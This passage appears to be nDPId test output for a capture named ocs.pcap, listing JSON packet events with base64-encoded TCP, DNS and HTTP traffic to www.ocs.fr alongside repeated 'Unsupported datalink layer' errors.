layer","datalink":12,"packet_id":853,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652837326} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":853,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMPAQABABn8dwKi0ArL40DbC2QBQ64tGkd71zgOwEC+s60YAAAEBCAoANZZpRwYuDAEBBQre9dNv3vXuiw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":854,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838236} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":854,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMPBQABABn8owKi0ArL40DbC2QBQ64tGkd717ouAEC+Xf5MAAAEBCAoANZbERwYu8A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":855,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838290} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":855,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMPCQABABn8bwKi0ArL40DbC2QBQ64tGkd717ouwEC\/qkwQAAAEBCAoANZbJRwYu8AEBBQre9flj3vX+zw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":856,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838294} 
-00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":856,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMPDQABABn8awKi0ArL40DbC2QBQ64tGkd717ouwEC\/qjZgAAAEBCAoANZbJRwYu8AEBBQre9flj3vYEOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":857,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838374} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":857,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMPEQABABn8ZwKi0ArL40DbC2QBQ64tGkd717ouwEC\/qkvwAAAEBCAoANZbRRwYu8AEBBQre9fP33vYEOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":858,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838746} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":858,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMPFQABABn8kwKi0ArL40DbC2QBQ64tGkd72BDuAEC\/BaR4AAAEBCAoANZb3RwYvWA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":859,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838837} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":859,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMPGQABABn8jwKi0ArL40DbC2QBQ64tGkd72CaeAEC\/qY0QAAAEBCAoANZcARwYvlA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":860,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838837} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":860,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMPHQABABn8iwKi0ArL40DbC2QBQ64tGkd72DxOAEC\/qXdgAAAEBCAoANZcARwYvlA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":861,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838951} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":861,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMPIQABABn8hwKi0ArL40DbC2QBQ64tGkd72FH+AEC\/qWE4AAAEBCAoANZcLRwYvpw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":862,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652839371} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":862,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMPJQABABn8gwKi0ArL40DbC2QBQ64tGkd72FkyAES\/qVfQAAAEBCAoANZc1RwYwCQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842535} -00326{"packet_event_id":1,"packet_event_name":"packet","packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":56,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":56,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAOJhyQABAER2IwKi0AggICAhetQA1ACRtrFcaAQAAAQAAAAAAAAN3d3cDb2NzAmZyAAABAAE="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":864,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842628} -00330{"packet_event_id":1,"packet_event_name":"packet","packet_id":864,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPD8ZQABABgMtwKi0ArL40NKmXgBQrzCnYwAAAACgAjkIgJAAAAIEBbQEAggKADWYegAAAAABAwMG"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":865,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842700} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":865,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8aQABABgM0wKi0ArL40NKmXgBQrzCnZDkypeeAEADlhQYAAAEBCAoANZiCGkFpBQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":866,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842701} -00524{"packet_event_id":1,"packet_event_name":"packet","packet_id":866,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":204,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":204,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAzD8bQABABgKbwKi0ArL40NKmXgBQrzCnZDkypeeAGADlkB4AAAEBCAoANZiCGkFpBUdFVCAvZGF0YV9wbGF0ZWZvcm1lL3Byb2dyYW0vMTg0OTYvdHZfZGV0YWlsX21vcnRkdW5wb3VydzAwMTIyMzZfNzJmNmMuanBnIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IHd3dy5vY3MuZnINCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":867,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842756} 
-00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":867,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8cQABABgMywKi0ArL40NKmXgBQrzCn\/Dkyq1OAEAESfskAAAEBCAoANZiIGkFpCw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":868,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842757} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":868,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8dQABABgMxwKi0ArL40NKmXgBQrzCn\/DkysL+AEAE\/eTAAAAEBCAoANZiIGkFpCw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":869,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842761} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":869,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8eQABABgMwwKi0ArL40NKmXgBQrzCn\/DkytiuAEAFsc5cAAAEBCAoANZiIGkFpCw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":870,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842821} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":870,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8fQABABgMvwKi0ArL40NKmXgBQrzCn\/Dkyu5eAEAGabfMAAAEBCAoANZiOGkFpDw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":871,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842821} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":871,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8gQABABgMuwKi0ArL40NKmXgBQrzCn\/DkywQOAEAHHaFoAAAEBCAoANZiOGkFpDw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":872,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842821} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":872,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8hQABABgMhwKi0ArL40NKmXgBQrzCn\/DkywQOwEAHHLZMAAAEBCAoANZiOGkFpDwEBBQo5MsZvOTLL2w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":873,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842827} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":873,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8iQABABgMgwKi0ArL40NKmXgBQrzCn\/DkywQOwEAHHKCYAAAEBCAoANZiPGkFpDwEBBQo5MsZvOTLRRw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":874,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842891} 
-00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":874,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8jQABABgMfwKi0ArL40NKmXgBQrzCn\/DkywQOwEAHHIrQAAAEBCAoANZiVGkFpDwEBBQo5MsZvOTLWsw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":875,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842893} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":875,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8kQABABgMewKi0ArL40NKmXgBQrzCn\/DkywQOwEAHHHUgAAAEBCAoANZiVGkFpDwEBBQo5MsZvOTLcHw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":876,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842895} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":876,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD8lQABABgMVwKi0ArL40NKmXgBQrzCn\/DkywQPQEAHHrJ4AAAEBCAoANZiWGkFpDwEBBRI5MuxjOTLxzzkyxm85Mtwf"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":877,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842974} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":877,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8mQABABgMcwKi0ArL40NKmXgBQrzCn\/Dky3B+wEAH0xkQAAAEBCAoANZieGkFpHAEBBQo5MuxjOTLxzw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":878,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842980} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":878,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8nQABABgMbwKi0ArL40NKmXgBQrzCn\/Dky4YuwEAIhwKoAAAEBCAoANZieGkFpHQEBBQo5MuxjOTLxzw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":879,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843038} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":879,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD8oQABABgMSwKi0ArL40NKmXgBQrzCn\/Dky4YvQEAIhOkwAAAEBCAoANZikGkFpHQEBBRI5Mvc7OTL8pzky7GM5MvHP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":880,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843040} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":880,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD8pQABABgMRwKi0ArL40NKmXgBQrzCn\/Dky4YvQEAIhNOAAAAEBCAoANZikGkFpHQEBBRI5Mvc7OTMCEzky7GM5MvHP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":881,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843104} 
-00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":881,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD8qQABABgMQwKi0ArL40NKmXgBQrzCn\/Dky5vfQEAJPLzEAAAEBCAoANZirGkFpKwEBBRI5Mvc7OTMCEzky7GM5MvHP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":882,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843106} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":882,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8rQABABgMXwKi0ArL40NKmXgBQrzCn\/Dky8c+wEAJ8lNQAAAEBCAoANZirGkFpKwEBBQo5Mvc7OTMCEw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":883,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843174} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":883,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8sQABABgMWwKi0ArL40NKmXgBQrzCn\/Dky8c+wEAJ8j2EAAAEBCAoANZiyGkFpKwEBBQo5Mvc7OTMHfw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":884,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843200} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":884,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8tQABABgMVwKi0ArL40NKmXgBQrzCn\/Dky8c+wEAJ8ifMAAAEBCAoANZi0GkFpKwEBBQo5Mvc7OTMM6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":885,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843243} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":885,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8uQABABgMgwKi0ArL40NKmXgBQrzCn\/DkzDOuAEAKpGzgAAAEBCAoANZi4GkFpPQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":886,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843269} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":886,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8vQABABgMfwKi0ArL40NKmXgBQrzCn\/DkzEleAEALWFZkAAAEBCAoANZi7GkFpQA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":887,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843335} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":887,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8wQABABgMewKi0ArL40NKmXgBQrzCn\/DkzF8OAEAMED\/YAAAEBCAoANZjCGkFpQg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":888,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843336} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":888,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8xQABABgMdwKi0ArL40NKmXgBQrzCn\/DkzHS+AEAMxCl0AAAEBCAoANZjCGkFpQg=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":889,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843384} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":889,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8yQABABgMcwKi0ArL40NKmXgBQrzCn\/DkzIpuAEANeBLgAAAEBCAoANZjHGkFpSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":890,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843385} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":890,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8zQABABgMbwKi0ArL40NKmXgBQrzCn\/DkzKAeAEAOL\/x4AAAEBCAoANZjHGkFpSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":891,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843387} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":891,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND80QABABgMawKi0ArL40NKmXgBQrzCn\/DkzLXOAEAO5+YQAAAEBCAoANZjHGkFpSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":892,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843389} 
-00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":892,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND81QABABgMZwKi0ArL40NKmXgBQrzCn\/DkzMt+AEAPm8+sAAAEBCAoANZjHGkFpSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":893,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843464} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":893,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND82QABABgMYwKi0ArL40NKmXgBQrzCn\/DkzOEuAEAQT7kUAAAEBCAoANZjPGkFpTg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":894,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843466} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":894,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD83QABABgMLwKi0ArL40NKmXgBQrzCn\/DkzOEuwEAQTxO0AAAEBCAoANZjPGkFpTgEBBQo5Mz23OTNDIw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":895,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843470} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":895,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD84QABABgMCwKi0ArL40NKmXgBQrzCn\/DkzOEvQEAQTm+wAAAEBCAoANZjPGkFpTgEBBRI5M0iPOTNN+zkzPbc5M0Mj"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":896,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843541} -00360{"packet_event_id":1,"packet_event_name":"packet","packet_id":896,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":80,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":80,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAUD85QABABgL5wKi0ArL40NKmXgBQrzCn\/DkzOEvwEAQTR4QAAAEBCAoANZjWGkFpTgEBBRo5M14\/OTNjqzkzSI85M037OTM9tzkzQyM="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":897,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843612} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":897,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD86QABABgMAwKi0ArL40NKmXgBQrzCn\/DkzOEvQEAQTZaYAAAEBCAoANZjdGkFpTgEBBRI5Mz23OTNN+zkzXj85M2Or"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":898,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843703} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":898,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD87QABABgL\/wKi0ArL40NKmXgBQrzCn\/DkzOEvQEAQTYDEAAAEBCAoANZjmGkFpTgEBBRI5Mz23OTNTZzkzXj85M2Or"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":899,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843788} 
